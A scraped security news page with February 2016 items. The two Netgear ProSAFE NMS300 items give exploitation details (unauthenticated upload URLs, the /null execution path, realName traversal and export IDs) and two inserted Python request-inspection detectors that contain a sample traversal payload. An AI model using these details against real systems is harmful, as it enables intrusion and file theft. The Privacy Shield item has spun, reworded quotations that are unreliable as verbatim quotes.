5.2.2016 Vulnerebility
A product from Netgear, one of the most popular router manufacturers, is affected by two different flaws that could allow hackers to compromise your corporate network and connected devices.
The reported critical vulnerabilities reside in Netgear's ProSafe NMS300 (Network Management System), a centralized and comprehensive management application for network administrators that enables them to discover, monitor, configure, and report on SNMP-based enterprise-class network devices.
SNMP (Simple Network Management Protocol) is a network management protocol that the ProSafe NMS300 application uses to gather data from various network devices such as servers, printers, hubs, switches, and routers.
Remotely collected data includes CPU load, routing tables, and network traffic statistics.
Serious Flaws in Network Management System
Joint security research by Pedro Ribeiro (security researcher at the UK-based firm Agile Information) together with CERT disclosed the vulnerabilities in the web interface of the management system, which could allow attackers to:
Upload and Execute any malicious file remotely (CVE-2016-1524)
Download any file from Server (CVE-2016-1525)
Unauthorized Arbitrary File Upload Flaw: This flaw is present in the default installation of NMS300, allowing an unauthenticated attacker to upload an arbitrary file and execute malicious code (remote code execution) with SYSTEM privileges.
Upload location: http://:8080/fileUpload.do
Upload location: http://:8080/lib-1.0/external/flash/fileUpload.do
Execution location: http://:8080/null
Directory Traversal Attack: This vulnerability allows authenticated users to read and download any restricted file by manipulating the ‘realName’ parameter of a POST request to the http://:8080/data/config/image.do?method=add URL.
The security vulnerabilities affect Netgear Management System NMS300, version 1.5.0.11 and earlier.
How to Protect Your Network from Hackers
Since no patches are yet available from Netgear to fix these vulnerabilities, the only mitigation network admins can implement is to strengthen the firewall policy by restricting access from untrusted sources.
As threats continue to evolve and increase in volume and frequency, you can no longer rely on static network security monitoring.
Network administrators are highly recommended to monitor network-based services and protocols on a continuous basis using a security monitoring solution, like (USM), which also includes (IDS), to help them quickly identify and remediate threats on their network.
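As an added example of the monitoring recommended above (not Netgear's, CERT's or the researcher's code), the following checks inspect individual HTTP requests to an NMS300 host against the endpoints named in the advisory summary: unauthenticated uploads from outside an assumed management subnet, requests under the /null execution path, and traversal sequences in the realName parameter of image.do?method=add. The request records, the 10.10.0.0/24 management subnet and all file names are constructed for the demo.

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed management subnet: the hosts that legitimately reach the NMS300 console.
MGMT_NETS = [ipaddress.ip_network("10.10.0.0/24")]

# Endpoints taken from the advisory summary above.
UPLOAD_PATHS = {"/fileUpload.do", "/lib-1.0/external/flash/fileUpload.do"}
EXEC_PREFIX = "/null"
TRAVERSAL_PATH = "/data/config/image.do"


def _decode(value: str) -> str:
    """Decode twice so %252e%252e (double-encoded '..') is caught too."""
    return unquote(unquote(value))


def looks_like_traversal(value: str) -> bool:
    """True for '..' segments, absolute paths or Windows drive prefixes."""
    v = _decode(value).replace("\\", "/")
    return ".." in v.split("/") or v.startswith("/") or bool(re.match(r"^[A-Za-z]:", v))


def from_mgmt(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MGMT_NETS)


def inspect_request(req: dict) -> list:
    """Return findings for one request: dict with src, method, url and optional body."""
    findings = []
    parts = urlsplit(req["url"])
    path = _decode(parts.path)
    query = parse_qs(parts.query)
    form = parse_qs(req.get("body", ""))

    if path in UPLOAD_PATHS and req["method"].upper() == "POST":
        # The upload handlers need no authentication (CVE-2016-1524), so an
        # upload from outside the management subnet is the strongest signal.
        if not from_mgmt(req["src"]):
            findings.append("CVE-2016-1524: file upload from non-management host")
        else:
            findings.append("file upload endpoint used (unauthenticated by default; review)")

    if path == EXEC_PREFIX or path.startswith(EXEC_PREFIX + "/"):
        findings.append("CVE-2016-1524: request under /null, possible execution of uploaded file")

    if path == TRAVERSAL_PATH and query.get("method") == ["add"]:
        for value in form.get("realName", []) + query.get("realName", []):
            if looks_like_traversal(value):
                findings.append("CVE-2016-1525: traversal in realName=%r" % value)
    return findings


def scan(requests: list) -> list:
    """Run inspect_request over a batch; returns (src, url, finding) tuples."""
    return [(r["src"], r["url"], f) for r in requests for f in inspect_request(r)]


# Constructed sample traffic: one benign page view, two suspicious requests
# from an outside address, one traversal attempt and one legitimate image add.
SAMPLE_REQUESTS = [
    {"src": "10.10.0.5", "method": "GET", "url": "/index.do"},
    {"src": "203.0.113.7", "method": "POST", "url": "/fileUpload.do", "body": "name=x"},
    {"src": "203.0.113.7", "method": "GET", "url": "/null/uploaded.jsp"},
    {"src": "10.10.0.5", "method": "POST", "url": "/data/config/image.do?method=add",
     "body": "realName=..%2F..%2F..%2Fsecret.txt"},
    {"src": "10.10.0.5", "method": "POST", "url": "/data/config/image.do?method=add",
     "body": "realName=logo.png"},
]

if __name__ == "__main__":
    for src, url, finding in scan(SAMPLE_REQUESTS):
        print("%-12s %-45s %s" % (src, url, finding))
```

The realName check looks at form fields as a reverse proxy or WAF would see them; plain access logs record only the URL, so the traversal finding needs request-body visibility.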
Netgear has not yet commented on this issue.
United Nations Rules in Favor of WikiLeaks Founder Julian Assange
5.2.2016 BigBrothers
VICTORY!
As a result of the legal action against WikiLeaks founder Julian Assange by both British and Swedish Governments, he has been arbitrarily detained by the United Kingdom and Sweden since his arrest in London over five years ago.
However, Assange filed a complaint against both the governments in September 2014 that has been considered by the United Nations Working Group on Arbitrary Detention.
Last week, Assange gave a statement that if the ruling comes against him, then he will surrender himself to Britain.
But, Victory! The decision is in favor of Assange.
The UN group has ruled that the UK and Swedish authorities had illegally detained Assange in violation of their international human rights obligations.
Julian Assange should be released immediately and allowed to leave the embassy, and both the UK and Sweden should compensate him for his "deprivation of liberty", the UN Working Group on Arbitrary Detention said in a statement released today.
"Having concluded that there was a continuous deprivation of liberty, the Working Group also found that the detention was arbitrary because he was held in isolation during the first stage of detention and because of the lack of diligence by the Swedish Prosecutor in its investigations, which resulted in the lengthy detention of Mr. Assange," reads the UN report.
But, Will UK and Sweden Let Assange Leave the country?
Although the decision is in favor of Assange, there is a possibility that neither country’s government will let him leave.
The UN group's ruling is not legally binding in the United Kingdom, so the European Arrest Warrant against Assange remains in place, which means the British government continues to have a legal obligation to extradite Assange.
The UK Foreign Office Secretary Philip Hammond said the UN panel's decision was "ridiculous", and Assange was a "fugitive from justice."
Hammond said the report "changes nothing" and Assange can come out "anytime he chooses" but he will still have to face justice in Sweden.
To that end, the Met Police said it will make "every effort" to arrest Assange should he leave the embassy.
Assange has been living in the Ecuadorian embassy in London for over 3 years, after losing a series of appeals in British courts, in order to avoid extradition to:
Sweden where he is facing sexual assault allegations, which he has always denied.
The United States where he could face cyber espionage charges for publishing classified US military and diplomatic documents via his website Wikileaks.
Assange's Lawyer: Sweden and UK should Respect UN’s Decision
Melinda Taylor, Assange's lawyer, says that if there is a positive ruling for Assange by UN group, Swedish and British government should respect their international obligations and comply with the decision, thereby allowing him to leave freely.
"If WGAD issues a positive determination, Mr. Assange expects the United Kingdom and Sweden to ensure that he can immediately exercise his right to personal liberty, in a manner which is consistent with his right to safety and protection from retaliatory acts associated with his groundbreaking work at WikiLeaks in exposing government violations and abuses," Taylor told Newsweek.
If this is the case, Taylor expects Assange to seek safe passage to Ecuador upon leaving the country's London embassy.
Established in 1991, the UN's Working Group on Arbitrary Detention is made up of 5 legal experts from around the world and has made hundreds of rulings, leading governments to release detainees.
Similar rulings from the UN panel have resulted in the release of:
Washington Post journalist Jason Rezaian, who was released in Iran last month.
Former pro-democracy President Mohamed Nasheed freed in the Maldives last year.
Burmese stateswoman Aung San Suu Kyi from house arrest in 2010.
Assange was initially arrested in London on 7 December 2010 under a European Arrest Warrant issued by Sweden over rape and sexual molestation charges, however, while on bail in 2012, he claimed asylum in the Ecuadorean embassy in Knightsbridge, where he is currently residing.
Australian NSW Government Department of Resources and Energy under attack. Is it Chinese cyber espionage?
5.2.2016 Safety
According to the NSW Government Department of Resources and Energy, Chinese hackers launched a malware-based attack on its network in December.
The Australian NSW Government Department of Resources and Energy revealed that in December 2015 unknown hackers targeted its systems. In the same period, the organization was launching a number of important projects, including the Shenhua Watermark coal mine project.
The Shenhua Watermark coal mine project is valued at an estimated $1.2 billion and indirectly involves the Chinese government, a circumstance that leads experts to believe that Chinese state-sponsored hackers may have launched the attack for intelligence purposes.
“In December 2015, NSW Department of Industry IT security systems detected a marked increase in virus/security activity attempting to impact systems at the Division of Resources and Energy (DRE) office in Maitland. The attacks were identified by specialist software we have in place to detect breaches to our firewalls. Given the increased levels of activity we took further steps to ensure that our systems were protected. We do not believe that the attacks penetrated our systems or any data was accessed at this time.” states the NSW Government Department of Resources and Energy in an official announcement.
The attack thus took the form of an increase in “virus/security activity attempting to impact systems at the Division of Resources and Energy (DRE) office in Maitland”, and steps were taken to increase security after the activity was detected.
The hackers coordinated a malware-based attack to break into the Department’s network; the organization has already announced that steps were taken to increase security in response to the offensive.
It is not clear whether the hackers successfully breached the network at the NSW Government Department of Resources and Energy; the New South Wales Opposition is calling for further investigation even though officials believe that no data was exfiltrated.
“These reports are highly disturbing. I have sought a briefing from the minister and his agency as soon as possible. The Opposition will be seeking an assurance from the Baird Government that the integrity of the commercially sensitive data held by the Department of Industry has not been compromised.” declared the Australian politician Adam Searle to the ABC’s The World Today.
Experts suspect the involvement of Chinese hackers; the Beijing government is considered responsible for a large number of cyber espionage operations worldwide.
“Well you don’t always know if you’ve been compromised in terms of cyber attack, so I think perhaps a more accurate way to put it would be to say they don’t think they’ve been compromised on this occasion. But if it’s like many other areas of government, they will be under constant attack, there will be sort of daily probes, hourly probes on the part of malicious cyber actors looking for vulnerabilities. ” added Peter Jennings, the executive director of the Australia Strategic Policy Institute.
“I think it is possible because we know China has one of the most aggressive cyber intelligence gathering policies around the world and that they are constantly looking to gather information, intellectual property, from the private sector as well as national security information from government departments.” “And in the case of Australia, obviously China has a deep interest in our approach to natural resources.”
In December, Chinese hackers conducted another major attack, on a supercomputer operated by Australia’s Bureau of Meteorology (BoM). The news was disclosed by the Australian Broadcasting Corporation (ABC). The Bureau of Meteorology is Australia’s national weather, climate and water agency, the analog of the USA’s National Weather Service.
“China is being blamed for a major cyber attack on the computers at the Bureau of Meteorology, which has compromised sensitive systems across the Federal Government.” states the ABC. “The bureau owns one of Australia’s largest supercomputers and provides critical information to a host of agencies. Its systems straddle the nation, including one link into the Department of Defence at Russell Offices in Canberra.”
The systems at the Bureau of Meteorology process a huge quantity of information and weather data that is provided to various industries, including the military.
Emergency. Hundreds of compromised WordPress sites serve TeslaCrypt ransomware
5.2.2016 Virus
Operators running websites based on WordPress must be aware of a spike in the number of compromised sites used to deliver the TeslaCrypt ransomware.
Administrators running websites based on the popular WordPress CMS must be aware of a spike in hacks that are resulting in the silent delivery of ransomware to the visitors.
According to the experts at Heimdal Security, threat actors hacked WordPress-based sites to redirect visitors to other domains hosting the Nuclear Exploit Kit.
People who visit the compromised WordPress sites using out-of-date versions of popular software, including Flash Player, Adobe Reader and Internet Explorer, can be infected with the TeslaCrypt ransomware. The experts at Heimdal discovered that the attackers behind the current WordPress compromises were exploiting an unidentified vulnerability and planting obfuscated JavaScript. The code redirects victims to the domain chrenovuihren, which serves an online ad that forces traffic to the site hosting Nuclear.
“Our team warns that a disproportionate amount of websites that employ the WordPress platform have been compromised by cyber criminals. Hundreds of WordPress websites spreading malware. The attackers fed obfuscated Javascript code to these websites. The users who end up on the hacked websites are redirected on a domain called “chrenovuihren” via multiple servers.” states a blog post published by Heimdal Security.
It isn’t the first time that the Nuclear Exploit Kit has been used to drop ransomware: in November the kit was used for the first time to serve the CryptoWall 4.0 ransomware, and in the past criminal groups used it to serve instances of CryptoWall 3.0.
The Heimdal Security researchers identified three IP addresses of Nuclear EK gateways:
159,203.24 [.] 40
164,132.80 [.] 71
162,243.77 [.] 214
The campaign relies on a number of domains to spread the malware; the domains are all subdomains of chrenovuihren.
“The campaign makes use of several domains to deliver the malicious code, which is why active servers can quickly change depending on which IP as DNS lookup they use,” continues the post.
“We have already blocked more than 85 domains that are being actively used in this campaign, and the list will most likely increase.”
The bad news is the low detection rate for this threat: just 2 of 66 antivirus solutions on VirusTotal are able to detect the malicious agent.
This latest campaign based on compromised WordPress websites comes a few days after another massive hacking campaign was identified by experts at Sucuri; the researchers at Heimdal speculate that the same threat actors are behind both campaigns.
Owners of WordPress-based websites must protect their servers, and let me share with you, once again, the following key recommendations to get protected against ransomware:
Keep software and your operating system updated at all times
Backup your data, do it often and in multiple locations
Use a security tool that can filter your web traffic and protect you against ransomware, which traditional antivirus cannot detect or block.
Someone Hijacks Botnet Network & Replaces Malware with an Antivirus
5.2.2016 Virus
The Dridex banking trojan, which is widely used by cyber criminals to distribute malware onto users’ machines, has now been found distributing security software.
A portion of the Dridex banking Trojan botnet may have been hacked or compromised by an unknown white hat hacker, who replaced the malicious links with Avira Antivirus installers.
What is the Dridex Banking Trojan? How Does it Work?
Dridex malware – also known as Bugat and Cridex – is believed to have been created by cyber criminals in Eastern Europe in an effort to harvest online banking details. Even after a high-profile takedown operation in late 2015, the Dridex botnet seems to be active again.
The Dridex virus typically distributes itself through spam messages or emails that include malicious attachments, most often a Microsoft Office file or Word document containing malicious macros.
Once the malicious file has been opened, the macros download and install the main payload of the virus – the trojan program itself – from a hijacked server, which installs and runs on the victim's computer.
The Dridex trojan program then creates a keylogger on the infected machine and manipulates banking websites with the help of transparent redirects and web-injects.
This results in stealing victim's personal data like usernames and passwords, with an ultimate aim to break into bank accounts and siphon off cash.
Hacker replaces Trojan with Anti-virus
However, the recent hack brings a surprise: instead of distributing the banking trojan, a portion of the Dridex botnet currently seems to be spreading legitimate copies of the free antivirus software from Avira, as the company itself has announced.
"The content behind the malware download [link] has been replaced, it is now providing [a legitimate], up-to-date Avira web installer instead of the usual Dridex loader," explained Avira malware expert Moritz Kroll, as reported by The Register.
Avira believes that the white hat hacker or hackers may have hacked into a portion of infected web servers using the same flaws the malware authors used and then replaced the malicious code with the Avira installer.
So, once infected, instead of receiving Dridex malware, the victims get a valid, signed copy of Avira antivirus software.
"We still don't know exactly who is doing this with our installer and why – but we have some theories," said Kroll. "This is certainly not something we are doing ourselves."
Although the motives behind distributing the Avira software are still unclear, these kinds of actions are considered illegal in many countries, said Kroll.
What Can Be Done to Protect Against Malware Attacks?
The guidance for protecting yourself from becoming part of the Dridex Banking Trojan botnet is:
Ensure you have an updated antivirus program running on your PC, which should be able to intercept the malicious attachments before they are opened.
One of the best measures for securing your online environment is to deploy an intrusion detection system at the network layer, which is especially useful for quickly detecting malware and other threats in your network when integrated with a SIEM (Security Information and Event Management) solution, such as (USM).
Be careful of opening email attachments sent from an unknown email address, particularly (in this case) Microsoft Word and Excel files.
Disable Macros in MS Office, or at least set the Macros to request permission before they run.
Someone has pwned the Dridex botnet serving the Avira Antivirus
5.2.2016 BotNet
Unknown actors have pwned the Dridex botnet and are using it to spread a legitimate copy of the Avira Antivirus software instead of the malicious payload.
This story is very intriguing: someone has hacked a portion of the dreaded Dridex botnet and replaced malicious links with references to installers for the Avira Antivirus. The antivirus company denies any involvement and speculates that an unknown white hat hacker is behind it.
Spam campaigns relying on the Dridex malware are threatening banking users across the world despite the operations conducted by law enforcement on a global scale. We last saw Dridex spreading across Europe, in particular targeting the customers of banks in the UK. In October, the NCA uncovered a series of cyber attacks based on a new strain of the Dridex banking trojan that allowed crooks to steal £20m in the UK alone.
Now Dridex is once again in the headlines: spam emails carrying the infamous malware continue to target netizens despite the arrest of one of its botmasters in August.
In October the experts at Palo Alto Networks confirmed that the overall volume of Dridex emails peaked at nearly 100,000 per day; the campaign rapidly reached 20,000 emails, mostly targeting email accounts in the UK.
Spam messages often include malicious Word documents embedded with macros; when victims open them, the macros download the Dridex payload from a hijacked server. Dridex is a banking trojan that relies on web injection to manipulate banking websites and uses a keylogger component to monitor the victim’s activity.
Now someone has pwned the Dridex botnet and is using it to spread legitimate antivirus software instead of the malicious payload. Despite the noble intent, even this unknown actor’s action is illegal, because an installer is being pushed onto the victims’ machines without their consent.
“The content behind the malware download URL has been replaced, it’s now providing an original, up-to-date Avira web installer instead of the usual Dridex loader,” explained Moritz Kroll, a malware researcher at Avira.
“We still don’t know exactly who is doing this with our installer and why – but we have some theories,” said Kroll. “This is certainly not something we are doing ourselves.”
“A whitehat may have hacked into infected web servers using the same vulnerabilities the malware authors used in the first place and has replaced the bad stuff with the Avira installer,” added Kroll.
Avira was involved in a similar case in the past, when its installer was bundled with the CryptoLocker and Tesla ransomware.
Do you have a Netgear ProSAFE NMS300? Here you are the exploit to hack it
5.2.2016 Vulnerebility
A security researcher has released the exploit code for two serious vulnerabilities in the Netgear ProSAFE NMS300 network management system.
Do you have a Netgear ProSAFE NMS300 Management System? Now you have a reason to worry because the security researcher Pedro Ribeiro has discovered two serious vulnerabilities in the network device.
The Netgear ProSAFE NMS300 Management System allows administrators to monitor and manage their networks by using a user friendly web-based interface.
The device is affected by a vulnerability (Unrestricted Upload of File with Dangerous Type), tracked as CVE-2016-1524, that could be exploited by a remote, unauthenticated attacker to upload an arbitrary file to the system.
Once a file is uploaded, it is available in the server’s root directory at the following URL:
http://<IP>:8080/null<filename>
and it could be executed with SYSTEM privileges.
The remote code execution vulnerability received a CVSS score of 8.3; it can be exploited by sending a specially crafted POST request to one of two Java servlets present in default NMS300 installations.
“By sending a specially crafted POST request to the servlets, an attacker can upload arbitrary files that will then be accessible from the NMS300 server’s root directory as http://<IP>:8080/null<filename>. The NMS300 server runs with SYSTEM privileges.” states the advisory issued by the CERT Coordination Center at Carnegie Mellon University.
The second flaw (Improper Limitation of a Pathname to a Restricted Directory, ‘Path Traversal’), tracked as CVE-2016-1525, discovered in the Netgear ProSAFE NMS300 is a directory traversal that could be exploited by an authenticated attacker to download any file from the device.
“An authenticated attacker can manipulate the realName parameter of a crafted POST request sent to http://<IP>:8080/data/config/image.do?method=add to load an arbitrary local file from the server host to a predictable location in the web service. The file can then be downloaded from http://<IP>:8080/data/config/image.do?method=export&imageId=<ID>, where <ID> is a count that increments by one every time a file is uploaded in this manner.” continues the advisory.
The security expert Ribeiro reported the flaws to Netgear via CERT/CC in December, but the issues are still present in the systems.
Ribeiro also published proof-of-concept code for the exploitation of the flaws, in the form of two Metasploit modules available for download.
While waiting for a fix, I suggest you isolate the web management interface of your device from the Internet.
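As an added example (not from the advisory or from Ribeiro's modules), the following Python request inspector flags the observable traces of the two flaws described above in traffic to the NMS300 web service: requests for /null<filename> (CVE-2016-1524) and realName values containing path traversal on image.do?method=add, correlated with a later method=export from the same source (CVE-2016-1525). The Request record format and the sample traffic are constructed; how the records reach the inspector (reverse proxy, WAF or proxy log) is an assumption.

```python
import re
from dataclasses import dataclass, field
from typing import Iterable
from urllib.parse import parse_qs, unquote, urlsplit


@dataclass
class Request:
    """One HTTP request as seen by a proxy in front of the NMS300 (assumed record format)."""
    src: str                                   # client IP
    method: str                                # HTTP method
    uri: str                                   # path plus query string
    form: dict = field(default_factory=dict)   # decoded POST form fields


@dataclass
class Alert:
    cve: str
    severity: str
    src: str
    detail: str


# Server-side executable types: a file with one of these extensions dropped into the
# webroot of a service running as SYSTEM is the worst case for CVE-2016-1524.
EXECUTABLE_EXTS = (".jsp", ".jspx", ".war", ".exe", ".dll", ".bat", ".cmd", ".ps1")

# "../" or "..\" anywhere, a Windows drive letter, or a leading slash/backslash
TRAVERSAL_RE = re.compile(r"(\.\.[\\/])|(^[a-zA-Z]:[\\/])|(^[\\/])")


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (%252e%252e -> %2e%2e -> ..)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def looks_like_traversal(value: str) -> bool:
    return bool(TRAVERSAL_RE.search(fully_decode(value)))


def inspect(requests: Iterable[Request]) -> list[Alert]:
    alerts: list[Alert] = []
    # Sources that already sent a traversal payload; a later export from the same
    # source is the retrieval step of CVE-2016-1525.
    traversal_sources: set[str] = set()
    for req in requests:
        parts = urlsplit(req.uri)
        path = fully_decode(parts.path)
        query = parse_qs(parts.query)
        # CVE-2016-1524: uploaded files are served back as /null<filename>; normal
        # NMS300 traffic has no reason to request such a path.
        if path.startswith("/null") and len(path) > len("/null"):
            sev = "high" if path.lower().endswith(EXECUTABLE_EXTS) else "medium"
            alerts.append(Alert("CVE-2016-1524", sev, req.src, f"request for uploaded file {path}"))
        if path == "/data/config/image.do":
            action = query.get("method", [""])[0]
            real_name = req.form.get("realName", "")
            if action == "add" and req.method == "POST" and looks_like_traversal(real_name):
                traversal_sources.add(req.src)
                alerts.append(Alert("CVE-2016-1525", "high", req.src,
                                    f"realName traversal: {fully_decode(real_name)}"))
            elif action == "export" and req.src in traversal_sources:
                image_id = query.get("imageId", ["?"])[0]
                alerts.append(Alert("CVE-2016-1525", "high", req.src,
                                    f"export of imageId={image_id} after traversal upload"))
    return alerts


# Constructed sample traffic: benign image handling from 10.0.0.5, a traversal upload
# followed by its export from 203.0.113.9, and fetches of uploaded files from 198.51.100.4.
SAMPLE_REQUESTS = [
    Request("10.0.0.5", "GET", "/index.html"),
    Request("10.0.0.5", "POST", "/data/config/image.do?method=add", {"realName": "logo.png"}),
    Request("10.0.0.5", "GET", "/data/config/image.do?method=export&imageId=7"),
    Request("203.0.113.9", "POST", "/data/config/image.do?method=add",
            {"realName": "..%2F..%2F..%2Fsecret.cfg"}),       # hypothetical target file
    Request("203.0.113.9", "GET", "/data/config/image.do?method=export&imageId=8"),
    Request("198.51.100.4", "GET", "/nullupload.jsp"),
    Request("198.51.100.4", "GET", "/nullnotes.txt"),
]

if __name__ == "__main__":
    for a in inspect(SAMPLE_REQUESTS):
        print(f"[{a.severity}] {a.cve} from {a.src}: {a.detail}")
```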
Safe Harbor replaced with Privacy Shield
4.2.2016 Security
The so-called Privacy Shield deal replaces the Safe Harbor arrangement that stood for over fifteen years before being struck down by a court in October.
United States and European administrators have hammered out a very late arrangement to allow data flows across the Atlantic to proceed without violating the law.
“Surprisingly, the US has given the EU compulsory assurances that the access of public establishments for national safety purposes will be liable to clear protections, limitations and oversight devices,” said Europe’s justice Chief Věra Jourová.
“Additionally, EU nationals will profit by redress mechanisms around there. In the setting of the arrangements for this contract, the United States has guaranteed that it doesn’t lead mass or aimless surveillance of Europeans. We have built up a yearly joint survey with a specific end goal to closely monitor the execution of these assurances.”
Under the terms of the new arrangement, which has yet to be approved by EU member states, the United States will give a yearly written commitment that it will not engage in mass surveillance of EU residents, and this will be reviewed by both sides once per year.
United States organizations wanting to import EU nationals’ data must provide “strong requirements on how private data is handled” and implement the same principles as European data protection laws. If EU citizens want to object to how their data is being used, organizations must respond within a set time and at no cost to the complainant.
Jourová and her colleague Andrus Ansip, vice president for the Digital Single Market at the European Commission, will now draft an “adequacy decision” setting out the new standards for member states to approve. The United States will likewise continue to adjust its administrative framework to accommodate the new agreement.
“Our public can make sure that their data is completely secured. Our organizations, particularly the small ones, have the legal guarantee they have to build up their actions across the Atlantic,” said Ansip.
“We have an obligation to check and we will thoroughly monitor the new procedure to ensure it keeps delivering. Today’s choice helps us construct a Digital Single Market in the EU, a dynamic and trusted online environment; additionally it reinforces our close partnership with the United States.”
Three months of desperate rewriting
The so-called Privacy Shield deal replaces the Safe Harbor arrangement that stood for over fifteen years before being struck down by a court in October. It is the result of three months of desperate and sometimes tense consultations between the two trade giants, with tech companies in both regions pushing hard for an arrangement.
The DPAs will now spend the next few days hammering out the details. There may still be some individual sticking points, but the need for action is moving Europe’s typically ponderous regulators more quickly than usual, because of industry pressure.
“We request that Europe’s national data protection authorities (DPAs) view this sign from the European Commission as an indication of conviction and hold off on any potential implementation activity until the new arrangement has been completely executed,” said John Higgins, director general of industry pressure group DigitalEurope.
“While they are evaluating the swap for Safe Harbor, we urge Europe’s DPAs to keep on regarding the utilization of other transfer systems, for example, contract clauses (MCCs) and binding corporate rules (BCRs), so information exchanges to the United States can proceed unrestricted.”
Questions are already being raised about the new arrangement. The language used in the official announcement is woolly at best, and there are fears that the deal struck may be too broad for some to swallow.
“The aftereffects of months of intervention seem weak, and if implemented we are expected to see additional legal trials in the European courts,” stated Ashley Winton, UK head of data protection and privacy at Paul Hastings LLP.
“The European Commission still needs to put forth the case that the United States arrangements of protection laws are basically identical, that data subjects have genuine rights against unbalanced handling in the United States, and that if there is illegal processing then people can have their own information erased and at last change in an appropriate court.”
“With all due appreciation, however, a few letters by the Obama organization are in no way, shape or form a legal base to ensure the basic rights of five hundred million European clients over the long run, when there is clear US law permitting mass surveillance,” stated Max Schrems, the Austrian student who brought down the Safe Harbor agreement with a case against Facebook.
“We don’t have the clear idea about the legal structure, yet this could clearly neglect the Court’s verdict. The Court has simply indicated that the United States needs to “guarantee” appropriate security by means of international commitments or domestic law. I question that a European can go to a United States court and claim his basic rights.”
He also indicated that the arrangement could come unstuck because of the NSA‘s PRISM programme, which allows the intelligence agencies to tap the data flows of partners such as Microsoft, Google, Apple or Facebook. This would appear to breach the agreement, and the courts are sure to get involved.
There is also the matter of legal workarounds. At present Microsoft is battling the United States Department of Justice over the agency’s claim that it can demand data held on European servers without a warrant.
Malwarebytes working hard to fix flaws in its antivirus
4.2.2016 Vulnerebility
The antivirus firm Malwarebytes is spending significant effort to fix serious vulnerabilities in its security product that were reported by the experts at Google’s Project Zero team.
The experts at Project Zero discovered that updates for Malwarebytes Antivirus were not digitally signed and were not downloaded over a secure HTTP connection, exposing users to man-in-the-middle attacks. An attacker could tamper with the updates to compromise the antivirus solution.
Google Project Zero reported the vulnerabilities to Malwarebytes in November and waited 90 days before publicly disclosing them.
The experts at Malwarebytes were not able to solve the problem in the 90-day period, so the researcher Tavis Ormandy published the details of the security issue.
“Malwarebytes fetches their signature updates over HTTP, permitting a man-in-the-middle attack,” he explained in a blog post.
“Therefore, this scheme is not sufficient to prevent tampering, and the developer should sign them. There are numerous simple ways to turn this into code execution, such as specifying a target file in the network configuration, writing a new TXTREPLACE rule to modify configuration files, or modifying a registry key with a REPLACE rule.”
Malwarebytes’ chief executive, Marcin Kleczynski, admitted the difficulties in solving the problem, announcing that several more weeks would be needed to fix it.
“In early November, a well-known and respected security researcher by the name of Tavis Ormandy alerted us to several security vulnerabilities in the consumer version of Malwarebytes Anti-Malware. Within days, we were able to fix several of the vulnerabilities server-side and are now internally testing a new version (2.2.1) to release in the next 3-4 weeks to patch the additional client-side vulnerabilities. At this time, we are still triaging based on severity,” he said in a blog post. “The research seems to indicate that an attacker could use some of the processes described to insert their own code onto a targeted machine. Based on the findings, we believe that this could only be done by targeting one machine at a time.”
Kleczynski took the opportunity to launch the Malwarebytes Bug Bounty program which will help the company to early discover any flaw in their software and to “encourage other security researchers to responsibly disclose vulnerabilities in Malwarebytes software.”
“I’d also like to take this opportunity to apologise. While these things happen, they shouldn’t happen to our users.”
Europol, a new move against terrorism and money laundering
4.2.2016 Safety
Europol is stepping up its efforts against terrorism, joining forces with the EU Financial Intelligence Units to fight terrorist financing and money laundering.
Since 1 January 2016, Europol has increased the level of integration among the nodes of the decentralised computer network of the European Union Member States’ Financial Intelligence Units (FIUs), the FIU.net.
“FIU.NET is a decentralised computer network supporting the FIUs in the European Union in their fight against Money Laundering and Terrorist Financing. Decentralised meaning, that there is no central database in one specific Member State where all the exchanged data is stored. When sending the information from one FIU to another, the exchanged data is only and safely stored on the FIU.NET databases at the premises of the FIUs involved in the exchange.” states the description on the website of the FIU network.
The initiative aims to create more synergy between financial and criminal intelligence agencies in the EU, a measure needed to counter the constant growth of criminal syndicates and terrorism in Europe.
“Under the auspices of the EU FIU platform and the renewed provisions set in the IV anti-money laundering Directive, the embedment of FIU.net into Europol aims to create more synergy between financial and criminal intelligence, ultimately boosting efforts to fight organised crime and terrorism in the EU.” states the official announcement issued by Europol.
FIU.net was established in 2002 and was co-financed until 2015 by the European Commission; it is a body created to monitor money laundering activities and terrorist financing. Its pillar is information sharing between the Financial Intelligence Units. Each FIU is tasked with monitoring financial transactions, in particular every transfer of money between entities in different states.
The implementation of a decentralised network implies that only the information shared between two Financial Intelligence Units is securely stored in the FIU.net databases.
The decision to embed the FIU.net network in Europol will enhance the exchange of financial intelligence. The information managed by the FIU.net architecture could be integrated with data managed by Europol.
This is an important step against crime and terrorism: data from financial intelligence could be integrated with information from the criminal intelligence activity conducted by Europol, a body of knowledge sustained by data provided by the law enforcement agencies of the EU countries.
“Thanks to the analytical capacities of Europol the suspicious money flows and their links to on-going terrorist and criminal activities can be further investigated. The FIU.net exchange platform will join other key Europol tools in the field such as the Terrorist Finance Tracking Program (TFTP), the Focal Point Sustrans (support to anti-money laundering investigations) and the network of the EU Asset Recovery Offices (AROs).” continues Europol.
The decision to join efforts against terrorist financing activities is a necessary step to respond to threats that are ever more dangerous for every country in the EU and are taking on a global dimension.
A week ago the director of Europol, Rob Wainwright, announced a new European Counter Terrorism Centre (ECTC) opening this month to fight terrorism; it is easy to predict that this new structure will also benefit from the new strategic alliance.
Former DoE worker was hacking to steal nuclear secrets and resell them
4.2.2016 Hacking
A former Department of Energy (DoE) employee, Charles Harvey Eccleston, 62, has been charged with trying to steal and sell nuclear secrets to foreign governments.
A former employee at the Department of Energy (DoE), Charles Harvey Eccleston, 62, has pleaded guilty to cyber espionage. The man attempted to infect at least 80 colleagues at the DOE with malware, with the intent of gaining control of the victims’ machines.
The man was working to open the door to foreign hackers, allowing them to exfiltrate sensitive information related to nuclear weapons.
According to the US Department of Justice, Eccleston attempted unauthorized access and intentional damage to a protected computer.
“Charles Harvey Eccleston, 62, a former employee of the U.S. Department of Energy (DOE) and the U.S. Nuclear Regulatory Commission (NRC), pleaded guilty today to a federal offense stemming from an attempted e-mail “spear-phishing” attack in January 2015 that targeted dozens of DOE employee e-mail accounts.” reads the statement issued by officials with the US Department of Justice.
Eccleston worked for both the DOE and the US Nuclear Regulatory Commission; his deep knowledge of the environment allowed him to run surgical attacks against current employees, who received highly targeted spear-phishing e-mails likely containing malicious links.
